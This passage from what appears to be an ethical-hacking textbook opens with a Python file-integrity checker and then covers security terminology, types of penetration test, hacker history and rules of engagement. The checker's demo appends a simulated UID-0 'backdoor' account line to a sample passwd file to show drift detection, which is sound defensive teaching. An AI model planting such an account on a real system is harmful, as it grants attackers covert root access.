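    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map every regular file under root (path relative to root, POSIX form) to its digest."""
    root = Path(root)
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            baseline[path.relative_to(root).as_posix()] = hash_file(path)
    return baseline


def compare_baselines(old, new):
    """Classify the differences between two baselines into added, removed and modified files."""
    old_keys = set(old)
    new_keys = set(new)
    return {
        "added": sorted(new_keys - old_keys),
        "removed": sorted(old_keys - new_keys),
        "modified": sorted(k for k in old_keys.intersection(new_keys) if old[k] != new[k]),
    }


def demo():
    """Baseline a constructed directory, tamper with it, and return the drift report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        # Constructed sample files; contents are illustrative only.
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        before = build_baseline(root)

        # Simulated tampering: a UID 0 account appended, a file dropped, a binary planted.
        with open(root / "etc" / "passwd", "a") as handle:
            handle.write("backdoor:x:0:0::/:/bin/sh\n")
        (root / "etc" / "hosts").unlink()
        (root / "rootkit.so").write_bytes(b"\x7fELF")

        after = build_baseline(root)
        return compare_baselines(before, after)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind, files)
```

In real use the baseline dictionary is what must be protected: write it to read-only media or to a host the monitored system cannot write to, since an attacker who can edit both the file and its stored digest is invisible to this comparison. &lt;br /&gt;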
&lt;br /&gt;
Availability is the third leg of the CIA triad. Availability simply means that when a legitimate user needs the information, it should be available. As an example, access to a backup facility 24x7 does not help if there are no updated backups from which to restore. Backups are one of the ways that availability is ensured. Backups provide a copy of critical information should files and data be destroyed or equipment fail. Failover equipment is another way to ensure availability. Systems such as redundant array of inexpensive disks (RAID) and subscription services such as redundant sites (hot, cold, and warm) are two other examples. Disaster recovery is tied closely to availability, as it’s all about getting critical systems up and running quickly. Denial of service (DoS) is an attack against availability. Although these attacks might not give access to the attacker, they do deny legitimate users the access they require.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Assets, Threats, and Vulnerabilities&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objectives:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Recall essential terminology &lt;br /&gt;
List the elements of security &lt;br /&gt;
&lt;br /&gt;
As with any new technology topic, terminology is used that must be  learned to better understand the field. To be a security professional,  you need to understand the relationship between threats, assets, and  vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
Risk is the likelihood that a threat will be realized against an asset. There are three basic elements of risk: assets, threats, and vulnerabilities. Let’s discuss each of these. &lt;br /&gt;
&lt;br /&gt;
An asset is any item of economic value owned by an individual or  corporation. Assets can be real — such as routers, servers, hard drives,  and laptops — or assets can be virtual, such as formulas, databases,  spreadsheets, trade secrets, and processing time. Regardless of the type  of asset discussed, if the asset is lost, damaged, or compromised,  there can be an economic cost to the organization. &lt;br /&gt;
&lt;br /&gt;
A threat is any agent, condition, or circumstance that could potentially  cause harm, loss, damage, or compromise to an IT asset or data asset.  From a security professional’s perspective, threats can be categorized  as events that can affect the confidentiality, integrity, or  availability of the organization’s assets. These threats can result in  destruction, disclosure, modification, corruption of data, or denial of  service. Some examples of the types of threats an organization can face  include the following: &lt;br /&gt;
&lt;br /&gt;
Unauthorized Access&lt;blockquote&gt;If user IDs and passwords for the organization’s infrastructure are obtained, whoever holds them gains access the organization never granted, and any confidential information those accounts can reach is compromised.&lt;/blockquote&gt;Stolen/Lost/Damaged/Modified Data&lt;blockquote&gt;A critical threat can occur if the information is lost, damaged, or unavailable to legitimate users.&lt;/blockquote&gt;Disclosure of Confidential Information&lt;blockquote&gt;Any time there is a disclosure of confidential information, it can be a critical threat to an organization if that disclosure causes loss of revenue, creates potential liabilities, or provides a competitive advantage to an adversary.&lt;/blockquote&gt;Hacker Attacks&lt;blockquote&gt;An insider or outsider who is unauthorized and purposely attacks an organization’s components, systems, or data.&lt;/blockquote&gt;Cyber Terrorism&lt;blockquote&gt;Attackers who target critical national infrastructure such as water plants, electric plants, gas plants, oil refineries, gasoline refineries, nuclear power plants, waste management plants, and so on.&lt;/blockquote&gt;Viruses and Malware&lt;blockquote&gt;An entire category of malicious software designed to damage or destroy a system or data.&lt;/blockquote&gt;Denial of Service (DoS) or Distributed Denial of Service Attacks&lt;blockquote&gt;An attack against availability that is designed to bring the network and/or access to a particular TCP/IP host/server to its knees by flooding it with useless traffic. Some classic DoS attacks, such as the Ping of Death and Teardrop, instead exploited flaws in how operating systems reassembled IP fragments, so a handful of crafted packets could crash a host. As with malware, attackers constantly develop new DoS techniques, so they form a continuous threat.&lt;/blockquote&gt;Natural Disasters, Weather, or Catastrophic Damage&lt;blockquote&gt;Hurricanes, such as Katrina that hit New Orleans in 2005, storms, weather outages, fire, flood, earthquakes, and other natural events compose an ongoing threat.&lt;/blockquote&gt;If the organization is vulnerable to any of these threats, there is an increased risk of successful attack. &lt;br /&gt;
&lt;br /&gt;
A vulnerability is a weakness in the system design, implementation,  software or code, or the lack of a mechanism. A specific vulnerability  might manifest as anything from a weakness in system design to the  implementation of an operational procedure. Vulnerabilities might be  eliminated or reduced by the correct implementation of safeguards and  security countermeasures. &lt;br /&gt;
&lt;br /&gt;
Vulnerabilities and weaknesses are common with software mainly because  there isn’t any perfect software or code in existence. Vulnerabilities  in software can be found in each of the following:&lt;br /&gt;
&lt;br /&gt;
Firmware&lt;blockquote&gt;This software is usually stored in ROM and loaded during system power up.&lt;/blockquote&gt;Operating System&lt;blockquote&gt;The operating system software loaded on workstations and servers.&lt;/blockquote&gt;Configuration Files&lt;blockquote&gt;The configuration file and configuration setup for the device.&lt;/blockquote&gt;Application Software&lt;blockquote&gt;The application or executable file that is run on a workstation or server.&lt;/blockquote&gt;Software Patch&lt;blockquote&gt;A small piece of software or code that the vendor or developer typically releases to update the software, perform maintenance, or fix known vulnerabilities or weaknesses.&lt;/blockquote&gt;Vulnerabilities are not the only concern the ethical hacker will have. Exploits are a big concern, as they are a common mechanism used to gain access. That’s discussed next.&lt;br /&gt;
&lt;br /&gt;
Defining an Exploit &lt;br /&gt;
&lt;br /&gt;
An exploit refers to a piece of software, tool, or technique that takes  advantage of a vulnerability that leads to privilege escalation, loss of  integrity, or denial of service on a computer system. Exploits are  dangerous because all software has vulnerabilities; hackers and  perpetrators know that there are vulnerabilities and seek to take  advantage of them. Although most organizations attempt to find and fix  vulnerabilities, some organizations lack sufficient funds for securing  their networks. Even those that do are burdened with the fact that there  is a window between when a vulnerability is discovered and when a patch  is available to prevent the exploit. The more critical the server, the  slower it is typically patched. Management might be afraid of  interrupting the server or afraid that the patch might affect stability  or performance. Finally, the time required to deploy and install the  software patch on production servers and workstations exposes an  organization’s IT infrastructure to an additional period of risk.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Security Testing&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Define the modes of ethical hacking &lt;br /&gt;
Security testing is the primary job of ethical hackers. These tests might be configured in such a way that the ethical hackers have no knowledge, full knowledge, or partial knowledge of the target of evaluation (TOE).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
The term target of evaluation (TOE) is widely used to identify an IT  product or system that is the subject of an evaluation. The EC-Council  and some security guidelines and standards use the term to describe  systems that are being tested to measure their confidentiality,  integrity, and availability. &lt;br /&gt;
&lt;br /&gt;
The goal of the security test (regardless of type) is for the ethical  hacker to test the security system and evaluate and measure its  potential vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;No Knowledge Tests (Blackbox)&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
No knowledge testing is also known as blackbox testing. Simply stated,  the security team has no knowledge of the target network or its systems.  Blackbox testing simulates an outsider attack as outsiders usually  don’t know anything about the network or systems they are probing. The  attacker must gather all types of information about the target to begin  to profile its strengths and weaknesses. The advantages of blackbox  testing include &lt;br /&gt;
&lt;br /&gt;
The test is unbiased, as the designer and the tester are independent of each other. &lt;br /&gt;
The tester has no prior knowledge of the network or target being examined, so there are no preset ideas about how the network functions. &lt;br /&gt;
A wide range of reconnaissance work is typically done to footprint the organization, which can help identify information leakage. &lt;br /&gt;
The test examines the target in much the same way as an external attacker would. &lt;br /&gt;
&lt;br /&gt;
The disadvantages of blackbox testing include &lt;br /&gt;
It can take more time to perform the security tests. &lt;br /&gt;
It is usually more expensive as it takes more time to perform. &lt;br /&gt;
It focuses only on what external attackers see, while in reality, most attacks are launched by insiders. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full Knowledge Testing (Whitebox) &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Whitebox testing takes the opposite approach of blackbox testing. This  form of security test takes the premise that the security tester has  full knowledge of the network, systems, and infrastructure. This  information allows the security tester to follow a more structured  approach and not only review the information that has been provided but  also verify its accuracy. So, although blackbox testing will typically  spend more time gathering information, whitebox testing will spend that  time probing for vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Partial Knowledge Testing (Graybox)&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
In the world of software testing, graybox testing is described as a  partial knowledge test. EC-Council literature describes graybox testing  as a form of internal test. Therefore, the goal is to determine what  insiders can access. This form of test might also prove useful to the  organization as so many attacks are launched by insiders.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Types of Security Tests&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
State security testing methodologies &lt;br /&gt;
&lt;br /&gt;
Several different types of security tests can be performed. These can  range from those that merely examine policy to those that attempt to  hack in from the Internet and mimic the activities of true hackers.  These security tests are also known by many names, including &lt;br /&gt;
&lt;br /&gt;
Vulnerability Testing &lt;br /&gt;
Network Evaluations &lt;br /&gt;
Red Team Exercises &lt;br /&gt;
Penetration Testing &lt;br /&gt;
Host Vulnerability Assessment &lt;br /&gt;
Vulnerability Assessment &lt;br /&gt;
Ethical Hacking &lt;br /&gt;
&lt;br /&gt;
No matter what the security test is called, it is carried out to make a systematic examination of an organization’s network, policies, and security controls. Its purpose is to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of potential security measures, and confirm the adequacy of such measures after implementation. Security tests can be defined as one of three types: high-level assessments, network evaluations, and penetration tests. Each is described as follows: &lt;br /&gt;
&lt;br /&gt;
High-level assessments&lt;blockquote&gt;Also called a level I assessment, it is a top-down look at the organization’s policies, procedures, and guidelines. This type of vulnerability assessment does not include any hands-on testing. The purpose of a top-down assessment is to answer three questions: Do the applicable policies exist? Are they being followed? Is their content sufficient to guard against potential risk?&lt;/blockquote&gt;
&lt;br /&gt;
Network evaluations&lt;blockquote&gt;Also called a level II assessment, it has all the elements of a level I assessment plus hands-on activities, which include information gathering, scanning, vulnerability assessment scanning, and similar work. Throughout this book, tools and techniques used to perform this type of assessment are discussed.&lt;/blockquote&gt;Penetration tests&lt;blockquote&gt;Unlike assessments and evaluations, penetration tests are adversarial in nature. Penetration tests are also referred to as level III assessments. These events take on an adversarial role and look to see what an outsider can access and control. Penetration tests are less concerned with policies and procedures and are more focused on finding low-hanging fruit and seeing what a hacker can accomplish on this network.&lt;/blockquote&gt;&lt;b&gt;NOTE&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Just remember that penetration tests are not fully effective if an  organization does not have the policies and procedures in place to  control security. Without adequate policies and procedures, it’s almost  impossible to implement real security. Documented controls are required.  &lt;br /&gt;
&lt;br /&gt;
How do ethical hackers play a role in these tests? That’s the topic of the next section.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Hacker and Cracker Descriptions&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Discuss malicious hackers &lt;br /&gt;
&lt;br /&gt;
To understand your role as an ethical hacker, it is important to know the players. Originally, the term hacker was used for a computer enthusiast: a person who enjoyed understanding the internal workings of a system, computer, or computer network. Over time, the popular press began to describe hackers as individuals who broke into computers with malicious intent. The hacker community responded with the word cracker to describe individuals who seek to compromise the security of a system without permission from an authorized party. With all this confusion over how to distinguish the good guys from the bad guys, the term ethical hacker was coined. An ethical hacker is an individual who performs security tests and other vulnerability assessment activities to help organizations secure their infrastructures. Sometimes ethical hackers are referred to as White Hat Hackers.&lt;br /&gt;
&lt;br /&gt;
Hacker motives and intentions vary. Some hackers are strictly  legitimate, whereas others routinely break the law. Let’s look at some  common categories: &lt;br /&gt;
&lt;br /&gt;
Whitehat Hackers —&lt;blockquote&gt;These individuals perform ethical hacking to help secure companies and organizations. Their belief is that you must examine your network in the same manner as a criminal hacker to better understand its vulnerabilities.&lt;/blockquote&gt;Reformed Blackhat Hackers —&lt;blockquote&gt;These individuals often claim to have changed their ways and that they can bring special insight into the ethical hacking methodology.&lt;/blockquote&gt;Grayhat Hackers —&lt;blockquote&gt;These individuals typically follow the law but sometimes venture over to the darker side of blackhat hacking. It would be unethical to employ these individuals to perform security duties for your organization, as you are never quite clear where they stand.&lt;/blockquote&gt;Who Attackers Are &lt;br /&gt;
Ethical hackers are up against several individuals in the battle to  secure the network. The following list presents some of the more  commonly used terms for these attackers: &lt;br /&gt;
&lt;br /&gt;
Phreakers —&lt;blockquote&gt;The original hackers. These individuals hacked telecommunication and PBX systems to explore their capabilities and make free phone calls. Their activities include physical theft, stolen calling cards, access to telecommunication services, reprogramming of telecommunications equipment, and compromising user IDs and passwords to gain unauthorized use of facilities, such as phone systems and voice mail.&lt;/blockquote&gt;Script/Click Kiddies —&lt;blockquote&gt;A term used to describe often younger attackers who use widely available freeware vulnerability assessment tools and hacking tools that are designed for attacking purposes only. These attackers typically do not have any programming or hacking skills and, given the techniques used by most of these tools, can be defended against with the proper security controls and risk mitigation strategies.&lt;/blockquote&gt;Disgruntled Employee —&lt;blockquote&gt;Employees who have lost respect and integrity for the employer. These individuals might or might not have more skills than the script kiddie. Many times, their rage and anger blind them. They rank as a potentially high risk because they have insider status, especially if access rights and privileges were provided or managed by the individual.&lt;/blockquote&gt;Whackers —&lt;blockquote&gt;Whackers are typically newbies who focus their limited skills and abilities on attacking wireless LANs and WANs.&lt;/blockquote&gt;Software Cracker/Hacker —&lt;blockquote&gt;Individuals who have skills in reverse engineering software programs and, in particular, the licensing registration keys used by software vendors when installing software onto workstations or servers. Although many individuals are eager to partake of their services, anyone who downloads programs with cracked registration keys is breaking the law and runs a greater risk from malicious code that might have been injected into the cracked software.&lt;/blockquote&gt;Cyber-Terrorists/Cyber-Criminals —&lt;blockquote&gt;An increasing category of threat that describes individuals or groups who are typically funded to conduct clandestine or espionage activities against governments, corporations, and individuals in an unlawful manner. These individuals are typically engaged in sponsored acts of defacement, DoS/DDoS attacks, identity theft, financial theft, or worse, compromising critical infrastructures in countries, such as nuclear power plants, electric plants, water plants, and so on.&lt;/blockquote&gt;System Cracker/Hacker —&lt;blockquote&gt;Elite hackers who have specific expertise in attacking vulnerabilities of systems and networks by targeting operating systems. These individuals get the most attention and media coverage because of the globally disruptive viruses, worms, and Trojans that they create. System Crackers/Hackers perform interactive probing to exploit security defects and flaws in network operating systems and protocols.&lt;/blockquote&gt;Now that you have an idea who the legitimate security professionals are up against, let’s briefly discuss some of the better known crackers and hackers. &lt;br /&gt;
&lt;br /&gt;
Hacker and Cracker History &lt;br /&gt;
&lt;br /&gt;
The well-known hackers of today grew out of the phone phreaking  activities of the 1960s. In 1969, Mark Bernay, also known as “The  Midnight Skulker,” wrote a computer program that allowed him to read  everyone else’s ID and password at the organization where he worked.  Although he was eventually fired, no charges were ever filed, as  computer crime was so new, there were no laws against it. &lt;br /&gt;
&lt;br /&gt;
Computer innovators include:&lt;br /&gt;
&lt;br /&gt;
Steve Wozniak and Steve Jobs —&lt;blockquote&gt;Members of the Homebrew  Computer Club of Palo Alto. John Draper was also a member of this early  computer club. Wozniak and Jobs went on to become co-founders of Apple  Computer.&lt;/blockquote&gt;Dennis Ritchie and Ken Thompson —&lt;blockquote&gt;While not criminal hackers, their desire for discovery led to the development of UNIX in 1969 while working at Bell Labs. &lt;/blockquote&gt;Well-known hackers and phreakers include: &lt;br /&gt;
&lt;br /&gt;
John Draper —&lt;blockquote&gt;Dubbed “Captain Crunch” for finding that a toy whistle shipped in boxes of Cap’n Crunch cereal produced the same frequency as AT&amp;amp;T’s trunk signaling tone, 2,600Hz. This discovery was made with the help of Joe Engressia. Although Joe was blind, he could whistle into a phone and produce a perfect 2,600Hz tone, which was useful for placing free long distance phone calls.&lt;/blockquote&gt;Mark Abene —&lt;blockquote&gt;Known as Phiber Optik. Mark helped form the “Masters of Deception” in 1990. Before being arrested in 1992, they fought an extended battle with the “Legion of Doom.”&lt;/blockquote&gt;Kevin Poulsen —&lt;blockquote&gt;Known as Dark Dante. In 1990 Kevin seized control of a Los Angeles radio station’s phone lines to ensure victory in a call-in contest for a Porsche 944. He was later arrested.&lt;/blockquote&gt;Robert Morris —&lt;blockquote&gt;The son of a chief scientist at the NSA. Morris, then a graduate student at Cornell University, accidentally released the “Morris Worm” in 1988; it was launched from MIT. This is now widely seen as the first release of a worm onto the Internet.&lt;/blockquote&gt;Kevin Mitnick —&lt;blockquote&gt;Known as “Condor,” Mitnick was the first hacker to hit the FBI Most Wanted list. He broke into such organizations as Digital Equipment Corp., Motorola, Nokia Mobile Phones, Fujitsu, and others. He was arrested in 1995 and has since been released and works as a legitimate security consultant.&lt;/blockquote&gt;Vladimir Levin —&lt;blockquote&gt;A Russian hacker who led a team that siphoned off $10 million from Citibank and transferred the money to bank accounts around the world. Levin eventually stood trial in the United States and was sentenced to three years in prison. Authorities recovered all but $400,000 of the stolen money.&lt;/blockquote&gt;Adrian Lamo —&lt;blockquote&gt;Known as the “Homeless Hacker” because of his transient lifestyle. Lamo spent his days squatting in abandoned buildings and traveling to Internet cafes, libraries, and universities to exploit security weaknesses in high-profile company networks, such as Microsoft, NBC, and the New York Times. He was eventually prosecuted and fined for the New York Times hack.&lt;/blockquote&gt;Although this list does not include all the hackers, crackers, and innovators of the computer field, it should give you an idea of some of the people who have made a name for themselves in this industry. Let’s now talk more about ethical hackers.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Ethical Hackers&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Define ethical hacking &lt;br /&gt;
&lt;br /&gt;
Ethical hackers perform penetration tests. They perform the same  activities a hacker would but without malicious intent. They must work  closely with the host organization to understand what the organization  is trying to protect, who they are trying to protect these assets from,  and how much money and resources the organization is willing to expend  to protect the assets. &lt;br /&gt;
&lt;br /&gt;
By following a methodology similar to that of an attacker, ethical  hackers seek to see what type of public information is available about  the organization. Information leakage can reveal critical details about  an organization, such as its structure, assets, and defensive  mechanisms. After the ethical hacker gathers this information, it will  be evaluated to determine whether it poses any potential risk. The  ethical hacker further probes the network at this point to test for any  unseen weaknesses. &lt;br /&gt;
&lt;br /&gt;
Penetration tests are sometimes performed in a double-blind environment. This means that the internal security team has not been informed of the penetration test. This serves an important purpose, allowing management to gauge the security team’s response to the ethical hacker’s probing and scanning. Do they notice the probes, or have the attempted attacks gone unnoticed? Now that the activities performed by ethical hackers have been described, let’s spend some time discussing the skills that ethical hackers need, the different types of security tests that ethical hackers perform, and the ethical hacker rules of engagement. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Required Skills of an Ethical Hacker&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Describe ethical hackers and their duties &lt;br /&gt;
&lt;br /&gt;
Ethical hackers need hands-on security skills. Although you do not have  to be an expert in everything, you should have an area of expertise.  Security tests are typically performed by teams of individuals, where  each individual typically has a core area of expertise. These skills  include:&lt;br /&gt;
&lt;br /&gt;
Routers —&lt;blockquote&gt;Knowledge of routers, routing protocols, and access control lists (ACLs). Certifications such as Cisco Certified Network Associate (CCNA) or Cisco Certified Internetwork Expert (CCIE) can be helpful.&lt;/blockquote&gt;Microsoft —&lt;blockquote&gt;Skills in the operation, configuration, and management of Microsoft-based systems. These can run the gamut from Windows NT to Windows 2003. These individuals might be Microsoft Certified Systems Administrator (MCSA) or Microsoft Certified Systems Engineer (MCSE) certified.&lt;/blockquote&gt;Linux —&lt;blockquote&gt;A good understanding of the Linux/UNIX OS. This includes security settings, configuration, and services such as Apache. These individuals may be Red Hat or Linux+ certified.&lt;/blockquote&gt;Firewalls —&lt;blockquote&gt;Knowledge of firewall configuration and the operation of intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be helpful when performing a security test. Individuals with these skills may be Cisco Certified Security Professional (CCSP) or Check Point Certified Security Administrator (CCSA) certified.&lt;/blockquote&gt;Mainframes —&lt;blockquote&gt;Although mainframes do not hold the position of dominance they once had in business, they are still widely used. If the organization being assessed has mainframes, the security team would benefit from having someone with that skill set on the team.&lt;/blockquote&gt;Network protocols —&lt;blockquote&gt;Most modern networks are Transmission Control Protocol/Internet Protocol (TCP/IP), although you might still find the occasional network that uses Novell or Apple routing information. Someone with good knowledge of networking protocols, as well as how these protocols function and can be manipulated, can play a key role in the team. These individuals may possess certifications in other OSes or hardware, or even a Network+ or Security+ certification.&lt;/blockquote&gt;Project management —&lt;blockquote&gt;Someone will have to lead the security test team, and if you are chosen to be that person, you will need a variety of the skills and knowledge types listed previously. It can also be helpful to have good project management skills. After all, you will be leading, planning, organizing, and controlling the penetration test team. Individuals in this role may benefit from having Project Management Professional (PMP) certification.&lt;/blockquote&gt;On top of all this, ethical hackers need to have good report writing skills and must always try to stay abreast of current exploits, vulnerabilities, and emerging threats, as their goal is to stay a step ahead of malicious hackers.&lt;br /&gt;
&lt;br /&gt;
Modes of Ethical Hacking &lt;br /&gt;
&lt;br /&gt;
With all this talk of the skills that an ethical hacker must have, you  might be wondering how the ethical hacker can put these skills to use.  An organization’s IT infrastructure can be probed, analyzed, and  attacked in a variety of ways. Some of the most common modes of ethical  hacking are shown here: &lt;br /&gt;
&lt;br /&gt;
Insider attack —&lt;blockquote&gt;This ethical hack simulates the types of  attacks and activities that could be carried out by an authorized  individual with a legitimate connection to the organization’s network.&lt;/blockquote&gt;Outsider attack —&lt;blockquote&gt;This  ethical hack seeks to simulate the types of attacks that could be  launched across the Internet. It could target Hypertext Transfer  Protocol (HTTP), Simple Mail Transfer Protocol (SMTP), Structured Query  Language (SQL), or any other available service.&lt;/blockquote&gt;Stolen equipment attack —&lt;blockquote&gt;This  simulation is closely related to a physical attack as it targets the  organization’s equipment. It could seek to target the CEO’s laptop or  the organization’s backup tapes. No matter what the target, the goal is  the same — extract critical information, usernames, and passwords.&lt;/blockquote&gt;Physical entry —&lt;blockquote&gt;This  simulationseeks to test the organization’s physical controls. Systems  such as doors, gates, locks, guards, closed circuit television (CCTV),  and alarms are tested to see whether they can be bypassed.&lt;/blockquote&gt;Bypassed authentication attack —&lt;blockquote&gt;This  simulation is tasked with looking for wireless access points (WAP) and  modems. The goal is to see whether these systems are secure and offer  sufficient authentication controls. If the controls can be bypassed, the  ethical hacker might probe to see what level of system control can be  obtained. &lt;/blockquote&gt;Social engineering attack —&lt;blockquote&gt;This  simulation does not target technical systems or physical access. Social  engineering attacks target the organization’s employees and seek to  manipulate them to gain privileged information. 
Proper controls, policies, and procedures can go a long way in defeating this form of attack.&lt;/blockquote&gt;Rules of Engagement —&lt;blockquote&gt;Every ethical hacker must abide by a few simple rules when performing the tests described previously. If not, bad things can happen to you, including loss of your job, civil penalties, or even jail time.&lt;/blockquote&gt;Never exceed the limits of your authorization —&lt;blockquote&gt;Every assignment will have rules of engagement. These include not only what you are authorized to target, but also the extent to which you are authorized to control each system. If you are only authorized to obtain a prompt on the target system, downloading the password hashes and starting to crack them would exceed what you have been authorized to do.&lt;/blockquote&gt;The tester should protect himself by agreeing, in advance, on limits regarding the damage the test may cause. There must be a non-disclosure agreement (NDA) and a signed authorization between the client and the tester to protect them both. A good example of a “get out of jail free” authorization document is available at &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.professionalsecuritytesters.org/modules.php?name=Downloads&amp;amp;d_op=viewdownload&amp;amp;cid=1"&gt;HYPERLINK&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Be ethical —&lt;br /&gt;
&lt;blockquote&gt;That’s right; the big difference between a  hacker and an ethical hacker is the word ethics. Ethics is a set of  moral principles about what is correct or the right thing to do. Ethical  standards are sometimes different from legal standards in that laws  define what we must do, whereas ethics define what we should do.&lt;/blockquote&gt;The OSSTMM — An Open Methodology&lt;br /&gt;
&lt;br /&gt;
In December 2001, the Open Source Security Testing Methodology Manual  (OSSTMM) began. Hundreds of people contributed knowledge, experience,  and peer-review to the project. Eventually, as the only publicly  available methodology that tested security from the bottom of operations  and up (as opposed to from the policy on down), it received the  attention of businesses, government agencies, and militaries around the  world. It also scored success with little security startups and  independent ethical hackers who wanted a public source for client  assurance of their security testing services. The primary purpose of the  OSSTMM is to provide a scientific methodology for the accurate  characterization of security through examination and correlation in a  consistent and reliable way. Great effort has been put into the OSSTMM  to assure reliable cross-reference to current security management  methodologies, tools, and resources. This manual is adaptable to  penetration tests, ethical hacking, security assessments, vulnerability  assessments, red-teaming, blue-teaming, posture assessments, and  security audits. Your primary purpose for using it should be to  guarantee facts and factual responses, which in turn assures your  integrity as a tester and the organization you are working for, if any.  The end result is a strong, focused security test with clear and concise  reporting. &lt;a href="http://www.isecom.org/" target="_blank"&gt;www.isecom.org&lt;/a&gt;  is the main site for the nonprofit organization, ISECOM, maintaining  the OSSTMM and many other projects. This “in the field” segment was  contributed by Pete Herzog, Managing Director, ISECOM. &lt;br /&gt;
&lt;br /&gt;
Maintain confidentiality —&lt;blockquote&gt;During security evaluations, you will likely be exposed to many types of confidential information. You have both a legal and a moral obligation to treat this information with the utmost privacy. It should not be shared with third parties and should not be used by you for any unapproved purpose. There is also an obligation to protect the information exchanged between the tester and the client; this has to be specified in the agreement.&lt;/blockquote&gt;Do no harm —&lt;blockquote&gt;It’s of utmost importance that you do no harm to the systems you test. Again, a major difference between a hacker and an ethical hacker is that you should do no harm. Misused, security tools can lock out critical accounts, cause denial of service (DoS), and crash critical servers or applications. Care should be taken to prevent these events unless that is the goal of the test.&lt;/blockquote&gt;Test Plans — Keeping It Legal &lt;br /&gt;
&lt;br /&gt;
Most of us probably make plans before we take a big trip or vacation. We  think about what we want to see, how we plan to spend our time, what  activities are available, and how much money we can spend and not regret  it when the next credit card bill arrives. Ethical hacking is much the  same minus the credit card bill. Many details need to be worked out  before a single test is performed. If you or your boss is tasked with  managing this project, some basic questions need to be answered, such as  what’s the scope of the assessment, what are the driving events, what  are the goals of the assessment, what will it take to get approval, and  what’s needed in the final report. &lt;br /&gt;
&lt;br /&gt;
Before an ethical hack test can begin, the scope of the engagement must be determined. &lt;br /&gt;
&lt;br /&gt;
Defining the scope of the assessment is one of the most important parts  of the ethical hacking process. At some point, you will be meeting with  management to start the discussions of the how and why of the ethical  hack. Before this meeting ever begins, you will probably have some idea  what management expects this security test to accomplish. Companies that  decide to perform ethical hacking activities don’t do so in a vacuum.  You need to understand the business reasons behind this event. Companies  can decide to perform these tests for various reasons. &lt;br /&gt;
&lt;br /&gt;
Some of the most common reasons are listed as follows: &lt;br /&gt;
&lt;br /&gt;
A breach in security - One or more events have occurred that highlighted a lapse in security. It could be that an insider was able to access data that should have been unavailable to him, or that an outsider was able to hack the organization’s web server. &lt;br /&gt;
&lt;br /&gt;
Compliance with state, federal, regulatory, or other law or mandate — Compliance with state or federal laws is another event that might be driving the assessment. Companies can face huge fines, and their officers potential jail time, if they fail to comply. The Gramm-Leach-Bliley Act (GLBA), Sarbanes-Oxley (SOX), and the Health Insurance Portability and Accountability Act (HIPAA) are three such laws. HIPAA’s Security Rule, for example, requires covered entities to perform a risk analysis of their electronic protected health information. Your organization might decide to include ethical hacking in this test regime.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
One such standard that the organization might be attempting to comply with is ISO 17799 (renumbered ISO/IEC 27002 in 2007). This information security standard was first published in December 2000 by the International Organization for Standardization and the International Electrotechnical Commission. This code of practice for information security management is considered a benchmark security standard and is organized into ten control areas: &lt;br /&gt;
. Security Policy &lt;br /&gt;
. Organizational Security &lt;br /&gt;
. Asset Classification and Control &lt;br /&gt;
. Personnel Security &lt;br /&gt;
. Physical and Environmental Security &lt;br /&gt;
. Communications and Operations Management &lt;br /&gt;
. Access Control &lt;br /&gt;
. Systems Development and Maintenance &lt;br /&gt;
. Business Continuity Management &lt;br /&gt;
. Compliance &lt;br /&gt;
&lt;br /&gt;
Due diligence — Due diligence is another one of the reasons a company  might decide to perform a penetration test. The new CEO might want to  know how good the organization’s security systems really are, or it  could be that the company is scheduled to go through a merger or is  acquiring a new firm. If so, the penetration test might occur  before  the purchase or after the event. These assessments are usually going to  be held to a strict timeline. There is only a limited amount of time  before the purchase and if performed afterward, the organization will  probably be in a hurry to integrate the two networks as soon as  possible. &lt;br /&gt;
&lt;br /&gt;
Test Phases &lt;br /&gt;
&lt;br /&gt;
